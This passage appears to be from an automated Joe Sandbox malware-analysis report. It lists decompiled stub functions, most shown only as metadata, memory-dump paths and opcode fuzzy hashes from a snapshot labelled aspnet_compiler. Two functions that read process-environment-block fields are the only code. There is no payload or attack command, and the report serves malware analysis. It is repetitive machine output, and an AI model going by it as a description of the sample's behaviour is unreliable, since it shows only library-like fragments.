                                                                                        • Instruction ID: aa3de324ebe31e8e34d2064790cd1350b136b249a7228a7b50604a1d09e1d4d7
                                                                                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                        • Instruction Fuzzy Hash: 6EC08C781415C05AFB2E670CCE24B203E50AB08708FC8019CEA090D4E2C36AA902C208
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011B7D50 Relevance: .0, Instructions: 7COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011B7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                        0x011b7d56
                                                                                        0x011b7d5b
                                                                                        0x011b7d60
                                                                                        0x011b7d5d
                                                                                        0x011b7d5d
                                                                                        0x011b7d5d

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                        • Instruction ID: 1284a6004b004727b9b17f351b46b5c0f62ab9682df4734d4ba8749b734e0651
                                                                                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                        • Instruction Fuzzy Hash: 90B092353019408FCF1ADF18C080B5933E4BB84A80B8400D4E400CBA61D329E8008900
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C2ACB Relevance: .0, Instructions: 5COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011C2ACB() {
				void* _t5;

				return E011AEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                        0x011c2adc

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                        • Instruction ID: 471f321f4a9bde63ef4dc3ac3969f7c4d2ff7d0724a3e249ff88a9cb80a54c3b
                                                                                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                        • Instruction Fuzzy Hash: 90B01232C52441CFCF06EF40C620B197731FB00750F094490D00127930C328AC01CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9950 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2fddf3903efa272104ddaccb7058540f6228bf1eaf74f3a33fa348ff1fafadba
                                                                                        • Instruction ID: e707bc0fbc150c114a3f0cc3b1697825563a205d378c337795050a52953a64e4
                                                                                        • Opcode Fuzzy Hash: 2fddf3903efa272104ddaccb7058540f6228bf1eaf74f3a33fa348ff1fafadba
                                                                                        • Instruction Fuzzy Hash: C09002A120180403D54465D959086170045A7D0382F51C015B6055655ECB698C617175
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D99D0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f13f069759d0340d708d2bd2967a043b907c1a543d2ad48a80cf1fe03649bf88
                                                                                        • Instruction ID: 6bfd115307471922ba0196907f55d237c5a14d1197f7c35e91561d1085140c44
                                                                                        • Opcode Fuzzy Hash: f13f069759d0340d708d2bd2967a043b907c1a543d2ad48a80cf1fe03649bf88
                                                                                        • Instruction Fuzzy Hash: F09002A121140042D50861D955087160085A7E1281F51C016B6145654CC6698C716165
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9820 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4375f39215b68e0f93acfb445e1f28ca1460246d3316d4205b5a9c88ac60f8b5
                                                                                        • Instruction ID: eed9c4a8bf76bbecad0321ae967e7f1d0e714e3e0f37e91aaa7fe8a53256a9bf
                                                                                        • Opcode Fuzzy Hash: 4375f39215b68e0f93acfb445e1f28ca1460246d3316d4205b5a9c88ac60f8b5
                                                                                        • Instruction Fuzzy Hash: 6E90027124140402D54571D955086160049B7D02C1F91C016B4415654EC7958A66BAA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011DB040 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d90afbbd9e3d0d8387735cddb545d231ddebba0087eee368560f9a97fbbc3c66
                                                                                        • Instruction ID: 5046b9a8310b8746f048a0b06033db1811101508c91dba661aa5ae37b43079bd
                                                                                        • Opcode Fuzzy Hash: d90afbbd9e3d0d8387735cddb545d231ddebba0087eee368560f9a97fbbc3c66
                                                                                        • Instruction Fuzzy Hash: B29002A1601540434944B1D959084165055B7E1381391C125B4445660CC7A88865A2A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D98A0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c21494c11433ce77b74d4dbcc340bb22a79550fea3a5489d80b99e9eb007c96
                                                                                        • Instruction ID: eb2fb3591e3ef488bf310754c2848dac304713c07d5954b7d33e0eaaaeddbd87
                                                                                        • Opcode Fuzzy Hash: 7c21494c11433ce77b74d4dbcc340bb22a79550fea3a5489d80b99e9eb007c96
                                                                                        • Instruction Fuzzy Hash: AC90026130140402D50661D955186160049E7D13C5F91C016F5415655DC7658963B172
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9B00 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6745961b6ca0ad953c5772c5946c857cf38a015385e5b873e35e3a4fb7a9e8c1
                                                                                        • Instruction ID: 8fa91ab3fa88c576ed1a4b2ab09f8b3c312205a1a32ddaf55bf733c24d525402
                                                                                        • Opcode Fuzzy Hash: 6745961b6ca0ad953c5772c5946c857cf38a015385e5b873e35e3a4fb7a9e8c1
                                                                                        • Instruction Fuzzy Hash: 4490026124140802D54471D995187170046E7D0681F51C015B4015654DC756897576F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011DA3B0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 96d432beda8b32741aec707661f95c733366387ac6140393d59b9f43b6cf603d
                                                                                        • Instruction ID: 61907c023a29279f3866da50b49f1687147e32c889475c2475c80264fab953dd
                                                                                        • Opcode Fuzzy Hash: 96d432beda8b32741aec707661f95c733366387ac6140393d59b9f43b6cf603d
                                                                                        • Instruction Fuzzy Hash: 5C90027120184002D54471D9954861B5045B7E0381F51C415F4416654CC7558866A261
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9A10 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dba91fc83882d75fa27c3fcdc5f7790363bf8f0456ed2e8d081f8334e7b54356
                                                                                        • Instruction ID: 5ee3eec29c274fa26cb27521bece9c6e823ced4e01539ba670a576a69a4573ab
                                                                                        • Opcode Fuzzy Hash: dba91fc83882d75fa27c3fcdc5f7790363bf8f0456ed2e8d081f8334e7b54356
                                                                                        • Instruction Fuzzy Hash: FF90027120180402D50461D9590C7570045A7D0382F51C015B9155655EC7A5C8A17571
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9A80 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bb17dd929944c25495bd09edaae51a86569452b5db440ae61f84a7320c887a16
                                                                                        • Instruction ID: 65558fd49315b55965b376d00391672c2bd59c90951b9bed6b9c4f0c4c97ae36
                                                                                        • Opcode Fuzzy Hash: bb17dd929944c25495bd09edaae51a86569452b5db440ae61f84a7320c887a16
                                                                                        • Instruction Fuzzy Hash: 7690026120184442D54462D95908B1F4145A7E1282F91C01DB8147654CCA5588656761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011DAD30 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb57771d13fe9c58b74f77024b4aa851bf1b10a2be12382538c3e5329254ecff
                                                                                        • Instruction ID: b29b208387cdc0dbe19111e86be79ae4ef807ac2b143ad0901ff61f922023217
                                                                                        • Opcode Fuzzy Hash: fb57771d13fe9c58b74f77024b4aa851bf1b10a2be12382538c3e5329254ecff
                                                                                        • Instruction Fuzzy Hash: A6900271A0540012954471D959186564046B7E07C1B55C015B4505654CCA948A6563E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a44b8f1b43ca1500b6a054a3dc1b1f7b630d9a1f4863702f60bc700448cf5214
                                                                                        • Instruction ID: c6fd7d550098cb0469bd3ace27b2e007b5a8a16e58d3df09647002147e617810
                                                                                        • Opcode Fuzzy Hash: a44b8f1b43ca1500b6a054a3dc1b1f7b630d9a1f4863702f60bc700448cf5214
                                                                                        • Instruction Fuzzy Hash: CC9002E1201540924904A2D99508B1A4545A7E0281B51C01AF5045660CC6658861A175
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9560 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c8eb477ce79d98bcc81085298e617c10046e027a7c295a0059f2636eadddf0f2
                                                                                        • Instruction ID: a414caae4e32149d321316f2aad13d96ab58a5e73b43494924144cd85d302d7d
                                                                                        • Opcode Fuzzy Hash: c8eb477ce79d98bcc81085298e617c10046e027a7c295a0059f2636eadddf0f2
                                                                                        • Instruction Fuzzy Hash: 36900265221400020549A5D9170851B0485B7D63D1391C019F5407690CC76188756361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D95F0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b99829d6758ee1b471a1da03dd92f8de1759ab545295b513adadeac8476183ab
                                                                                        • Instruction ID: dc7d48f068bd5a064435539d5044b185fb37e61cc12eae3c0f4d788bccce220c
                                                                                        • Opcode Fuzzy Hash: b99829d6758ee1b471a1da03dd92f8de1759ab545295b513adadeac8476183ab
                                                                                        • Instruction Fuzzy Hash: AD90027120140802D50861D959086960045A7D0381F51C015BA015755ED7A588A17171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011DA710 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9003077f42fe01be61b5cbf5ab03f6fec31746fe805e543de10687ce5473e200
                                                                                        • Instruction ID: d074c284f3ec44f9241d9ca57c0b0a69fdf05db4a1a84e27e4f6efb90f0f2c88
                                                                                        • Opcode Fuzzy Hash: 9003077f42fe01be61b5cbf5ab03f6fec31746fe805e543de10687ce5473e200
                                                                                        • Instruction Fuzzy Hash: 81900271301400529904A6D96908A5A4145A7F0381B51D019B8005654CC69488716161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9730 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5a62cf5a6001661c6edfebf8a263a1a7a4ee4a08601f8b3509e1f02514c08b67
                                                                                        • Instruction ID: 31312ecac454f1c9b4b39f6229a183e2807269cbd35e53ea99f56a2bf5988beb
                                                                                        • Opcode Fuzzy Hash: 5a62cf5a6001661c6edfebf8a263a1a7a4ee4a08601f8b3509e1f02514c08b67
                                                                                        • Instruction Fuzzy Hash: 2990026160540402D54471D9651C7160055A7D0281F51D015B4015654DC7998A6576E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011DA770 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 90dfe922188ebca0e5d5767d29e0be6af2f988041ee80d07ce886cbbb4aa20c0
                                                                                        • Instruction ID: a057de41f5aa387208a903044300eee4f79e8b5e29283170d81952ac44be1032
                                                                                        • Opcode Fuzzy Hash: 90dfe922188ebca0e5d5767d29e0be6af2f988041ee80d07ce886cbbb4aa20c0
                                                                                        • Instruction Fuzzy Hash: 6690027520544442D90465D96908A970045A7D0385F51D415B441569CDC7948871B161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9770 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3cf73e6f9e38f9da0602754175127dc431a44bb6d1941050613f859e039dc117
                                                                                        • Instruction ID: 7323ef1d8f44f680bf284a546e6f07c48f99f7d5edd2a63cf1e53a9fe3273876
                                                                                        • Opcode Fuzzy Hash: 3cf73e6f9e38f9da0602754175127dc431a44bb6d1941050613f859e039dc117
                                                                                        • Instruction Fuzzy Hash: A290026120544442D50465D9650CA160045A7D0285F51D015B5055695DC7758861B171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9760 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 507d09a137b0846a8691823f4b07a43f75cd152744b27e7d7e8331809a598103
                                                                                        • Instruction ID: 8d3fa60ba432e1cb6ffb8ec1533789d5a29f4096bbbff342e2f58987763037c9
                                                                                        • Opcode Fuzzy Hash: 507d09a137b0846a8691823f4b07a43f75cd152744b27e7d7e8331809a598103
                                                                                        • Instruction Fuzzy Hash: D390027120140403D50461D9660C7170045A7D0281F51D415B4415658DD79688617161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9610 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1b4ba680bb5f0180021cbc6240cf7dbdef32f9439132d3c332a089843e8eaa9e
                                                                                        • Instruction ID: ce681f345c0afb891ccd12138d5a8d2a2e076319aa89d81ea4de610d470251eb
                                                                                        • Opcode Fuzzy Hash: 1b4ba680bb5f0180021cbc6240cf7dbdef32f9439132d3c332a089843e8eaa9e
                                                                                        • Instruction Fuzzy Hash: 6390027160540802D55471D955187560045A7D0381F51C015B4015754DC7958A6576E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D9650 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c47285f70b28ac94ece35b5e250a178b529a51ebdf07d330eb649bbb777b87e7
                                                                                        • Instruction ID: 5b278fe6113c3368b4473da68c3d45ca21a94d7259a8d29bbc45a87a6c0e3ea3
                                                                                        • Opcode Fuzzy Hash: c47285f70b28ac94ece35b5e250a178b529a51ebdf07d330eb649bbb777b87e7
                                                                                        • Instruction Fuzzy Hash: 0590027120544842D54471D95508A560055A7D0385F51C015B4055794DD7658D65B6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D96D0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b50cec5147ec9162042f5fc4efa95666552a31d1e0987c0056bb3edc1b3524c1
                                                                                        • Instruction ID: 430bf2a36beb89d6482dadb8f895752f8d7cfc1aaa3b7bd3e04fec87b99e08ce
                                                                                        • Opcode Fuzzy Hash: b50cec5147ec9162042f5fc4efa95666552a31d1e0987c0056bb3edc1b3524c1
                                                                                        • Instruction Fuzzy Hash: 2A90027120140842D50461D95508B560045A7E0381F51C01AB4115754DC755C8617561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

